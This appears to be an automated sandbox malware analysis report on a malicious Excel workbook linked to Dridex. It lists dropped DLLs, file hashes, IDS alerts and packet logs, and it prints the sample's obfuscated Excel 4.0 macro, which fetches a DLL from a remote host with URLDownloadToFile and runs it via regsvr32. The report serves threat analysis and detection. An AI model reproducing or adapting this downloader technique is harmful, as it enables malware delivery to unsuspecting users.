false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
8.8.7.7 | unknown | United States | 15169 | GOOGLEUS | false | |
107.180.50.232 | tpfcu.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false | |
18.117.84.120 | unknown | United States | 3 | MIT-GATEWAYSUS | true |
Private |
---|
IP |
---|
192.168.2.1 |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 431937 |
Start date: | 09.06.2021 |
Start time: | 15:20:54 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 8m 4s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Documents_13134976_1377491379.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 35 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.expl.evad.winXLSB@28/13@1/4 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
15:22:03 | API Interceptor | |
15:22:35 | Autostart | |
15:22:43 | Autostart |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
18.117.84.120 | Get hash | malicious | Browse |
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AS-26496-GO-DADDY-COM-LLCUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
MIT-GATEWAYSUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
8916410db85077a5460817142dcbc8de | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Temp\L3YD7CE.dll | Get hash | malicious | Browse | ||
C:\Users\user\iepfusn.dll | Get hash | malicious | Browse | ||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll | Get hash | malicious | Browse |
Created / dropped Files |
---|
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60080 |
Entropy (8bit): | 7.995256720209506 |
Encrypted: | true |
SSDEEP: | 768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4 |
MD5: | 6045BACCF49E1EBA0E674945311A06E6 |
SHA1: | 379C6234849EECEDE26FAD192C2EE59E0F0221CB |
SHA-256: | 65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58 |
SHA-512: | DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.132472625894721 |
Encrypted: | false |
SSDEEP: | 6:kKgy3Pse8N+SkQlPlEGYRMY9z+4KlDA3RUeWlK1MMx:4Ks8kPlE99SNxAhUe3OMx |
MD5: | B84815C12C603EC6FB8D1EDA4CA29530 |
SHA1: | CD18E3BC8FCFB385C1225EF5ED0FCF1BD9DF0434 |
SHA-256: | 961CA06C24F3E4B504765841EFB908C623E99B0EC81EBB6804928909F4360E52 |
SHA-512: | 7771C7B0CC1743F21C13270B0B8390410E1BBD9BB849F9DF045F5A9976B99A169328F257CD09403420C24B62275F332CE54909F8603970F07C71C90501984D2F |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134915 |
Entropy (8bit): | 5.369271958078095 |
Encrypted: | false |
SSDEEP: | 1536:lcQIKNEeBXA3gBwlpQ9DQW+z7534ZlCKWXboOilX5ENLWME9:REQ9DQW+zAXOe |
MD5: | 76B550BC14095A4AFBB5E04BE5F42175 |
SHA1: | 2A74379C0333997DFED5BB5F7BDB7F707BAF68E4 |
SHA-256: | 7F1E14B77DF7F3FCEB0C34441CA6F6A68288706308BF5B072FAE111AF6BE0817 |
SHA-512: | 41056D2FD4A84E050F7EDC8F962B02C093AD02F3B2B8E410F424A6E155672AF6BA67D21579EC5B0BF6A56F9E8B71B2B0035C5E6B822B78072D1EB2DCBCA3E94F |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 9924 |
Entropy (8bit): | 7.973758306371751 |
Encrypted: | false |
SSDEEP: | 192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB |
MD5: | B34FB4F2F0F9E70B72BA3AFD028CD97C |
SHA1: | C6868336F78DEA1E718965DF3341039581DB5B5A |
SHA-256: | 189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB |
SHA-512: | 4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 6177 |
Entropy (8bit): | 7.959095006853368 |
Encrypted: | false |
SSDEEP: | 96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a |
MD5: | C7ED6FC355D8632DB1464BE3D56BF5CC |
SHA1: | 615484A338922DDF00B903CFA48060AD60D70207 |
SHA-256: | 26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C |
SHA-512: | FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5744 |
Entropy (8bit): | 7.966496386988271 |
Encrypted: | false |
SSDEEP: | 96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf |
MD5: | 9AD30E24270C495AE68EAF3A1EEECBFB |
SHA1: | 8642D256E7FFBEF5804A2D2220A1FE475A99DC36 |
SHA-256: | 6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20 |
SHA-512: | EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 956 |
Entropy (8bit): | 7.683552542542939 |
Encrypted: | false |
SSDEEP: | 24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB |
MD5: | 32C83607A5C98C5A634278E5AED3AD61 |
SHA1: | EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362 |
SHA-256: | 4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF |
SHA-512: | AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 23989 |
Entropy (8bit): | 7.989754044300238 |
Encrypted: | false |
SSDEEP: | 384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy |
MD5: | 839795652A8FE78F26F4D86D757ABDE8 |
SHA1: | 979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60 |
SHA-256: | 1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E |
SHA-512: | E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 205312 |
Entropy (8bit): | 6.709188825960524 |
Encrypted: | false |
SSDEEP: | 3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b |
MD5: | 28193BA741232F91101849F606FA8419 |
SHA1: | 12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5 |
SHA-256: | 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2 |
SHA-512: | 783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
IE Cache URL: | https://tpfcu.com/getfile.php |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 80566 |
Entropy (8bit): | 7.893302821449264 |
Encrypted: | false |
SSDEEP: | 1536:Xelem3l7eO+dRRVnyY7lMVGoIahaDHTU6hryF70cAeWvijWGHc:bol7eO6RSY72sTU2yF70cAijW2c |
MD5: | 5138B6C608292E4C867FC32717C1CF59 |
SHA1: | 836E1C79573D2D8F2E5FCED81BDCA22EEE921EF1 |
SHA-256: | F04037BBF157BEAF7297874FD3700B1059E20B1E6FBF199C61F2B1E112E660C7 |
SHA-512: | 43AF1CC70CD407BBB7BD1B78B98F1054A85A44C96DDAEA6B1AA3AA2D5D0A943659D445D8566010CE5FB177C2597A57FEEA27D5440B8A8D285E2BD5891A31C67C |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 205312 |
Entropy (8bit): | 6.709188825960524 |
Encrypted: | false |
SSDEEP: | 3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b |
MD5: | 28193BA741232F91101849F606FA8419 |
SHA1: | 12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5 |
SHA-256: | 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2 |
SHA-512: | 783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtt:RJ1 |
MD5: | 7AB76C81182111AC93ACF915CA8331D5 |
SHA1: | 68B94B5D4C83A6FB415C8026AF61F3F8745E2559 |
SHA-256: | 6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF |
SHA-512: | A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7 |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 205312 |
Entropy (8bit): | 6.709188825960524 |
Encrypted: | false |
SSDEEP: | 3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b |
MD5: | 28193BA741232F91101849F606FA8419 |
SHA1: | 12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5 |
SHA-256: | 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2 |
SHA-512: | 783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.867132102918904 |
TrID: |
|
File name: | Documents_13134976_1377491379.xlsb |
File size: | 64636 |
MD5: | 276bf3db434b887bb77adca0bd46e130 |
SHA1: | eee2be9136f2c70a28b6ca5289e73e2a38453da2 |
SHA256: | 27180043ebeb8f2aa8728c5ee020fb5368be3df4e9008b8f01242bf82d5780ce |
SHA512: | abe0052635a1064304828a7b8fa8663997fb023d542944ddb3bdb346170bd5fbe9a76b2e53184e4b3c7a9e09a768982a396b7253d83c309fd7f522f427262e7a |
SSDEEP: | 1536:LvnO2wWjlMVGoIahaDHTU6hryF70liWWGH0AeWl+R:LGCj2sTU2yF70liWW200+R |
File Content Preview: | PK..........!.+...............[Content_Types].xml ...(.....................................................................................................................................................................................!!.................. |
File Icon |
---|
Icon Hash: | 74f0d0d2c6d6d0f4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "Documents_13134976_1377491379.xlsb" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
CALL(before.2.18.46.sheet!BJ29&before.2.18.46.sheet!BN29, before.2.18.46.sheet!BM35&before.2.18.46.sheet!BM38&before.2.18.46.sheet!BS41&before.2.18.46.sheet!BU41&before.2.18.46.sheet!BS25, before.2.18.46.sheet!BK50&before.2.18.46.sheet!BS42, before.2.18.46.sheet!BP33, before.2.18.46.sheet!BJ19&BJ20&BJ21&BJ22, before.2.18.46.sheet!BN24, before.2.18.46.sheet!BP38, before.2.18.46.sheet!BP41)
=EXEC(Sheet1!BF42&Sheet1!BF43&Sheet1!BF44&Sheet1!BN24)=HALT()
,,,,,,,,,,,,,,,ht,,,,,,,,,,,,,,,,,,,,,,,,,,tps://,,,,,,,,,,,,,,,,,,,,,,,,,,tpfcu.com/getfile.,,,,,,,,,,,,,,,,,,,,,,,,,,php,,,,,,,,,,,"=CALL(before.2.18.46.sheet!BJ29&before.2.18.46.sheet!BN29,before.2.18.46.sheet!BM35&before.2.18.46.sheet!BM38&before.2.18.46.sheet!BS41&before.2.18.46.sheet!BU41&before.2.18.46.sheet!BS25,before.2.18.46.sheet!BK50&before.2.18.46.sheet!BS42,before.2.18.46.sheet!BP33,before.2.18.46.sheet!BJ19&BJ20&BJ21&BJ22,before.2.18.46.sheet!BN24,before.2.18.46.sheet!BP38,before.2.18.46.sheet!BP41)",,,,,,,,,,,,,,,,,,,,,,,,,,=Sheet2!BB10(),,,,,,,,,,,,,,,,,,,..\iepfusn.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,A,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,LMon,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,LDownl,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,oa,,dToFile,,,,,,,,,,,re,,,,,,,,,,,,,CBB,,,,,,,,,,,,,gs,,,,,,,,,,,,,,,,,,,,,,,,,,"=""vr32 -s """,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJC,,,,,,,,,,
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
06/09/21-15:22:05.833841 | ICMP | 382 | ICMP PING Windows | 192.168.2.6 | 8.8.7.7 | ||
06/09/21-15:22:05.833841 | ICMP | 384 | ICMP PING | 192.168.2.6 | 8.8.7.7 | ||
06/09/21-15:22:10.528872 | ICMP | 382 | ICMP PING Windows | 192.168.2.6 | 8.8.7.7 | ||
06/09/21-15:22:10.528872 | ICMP | 384 | ICMP PING | 192.168.2.6 | 8.8.7.7 | ||
06/09/21-15:22:20.469415 | ICMP | 382 | ICMP PING Windows | 192.168.2.6 | 8.8.7.7 | ||
06/09/21-15:22:20.469415 | ICMP | 384 | ICMP PING | 192.168.2.6 | 8.8.7.7 | ||
06/09/21-15:22:25.029456 | ICMP | 382 | ICMP PING Windows | 192.168.2.6 | 8.8.7.7 | ||
06/09/21-15:22:25.029456 | ICMP | 384 | ICMP PING | 192.168.2.6 | 8.8.7.7 | ||
06/09/21-15:22:36.677659 | ICMP | 382 | ICMP PING Windows | 192.168.2.6 | 8.8.7.7 | ||
06/09/21-15:22:36.677659 | ICMP | 384 | ICMP PING | 192.168.2.6 | 8.8.7.7 | ||
06/09/21-15:22:41.530548 | ICMP | 382 | ICMP PING Windows | 192.168.2.6 | 8.8.7.7 | ||
06/09/21-15:22:41.530548 | ICMP | 384 | ICMP PING | 192.168.2.6 | 8.8.7.7 | ||
06/09/21-15:22:49.386614 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49740 | 18.117.84.120 | 192.168.2.6 |
06/09/21-15:23:25.363224 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49747 | 18.117.84.120 | 192.168.2.6 |
06/09/21-15:23:57.298792 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49750 | 18.117.84.120 | 192.168.2.6 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 9, 2021 15:21:55.282211065 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.420984030 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.421092987 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.422017097 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.558451891 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.561686039 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.561707973 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.561739922 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.561764956 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.561799049 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.561822891 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.606833935 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.743777037 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.743941069 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.744791031 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.920869112 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927237034 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927289009 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927320004 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927349091 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.927350998 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927382946 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.927383900 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927417994 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927438021 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.927445889 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927464008 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.927479029 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927501917 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.927512884 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927524090 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.927546024 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927555084 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.927598953 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065057993 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065104961 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065144062 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065176010 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065207005 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065208912 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065237045 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065244913 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065280914 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065282106 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065314054 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065329075 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065345049 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065359116 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065376043 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065381050 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065402985 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065424919 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065438032 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
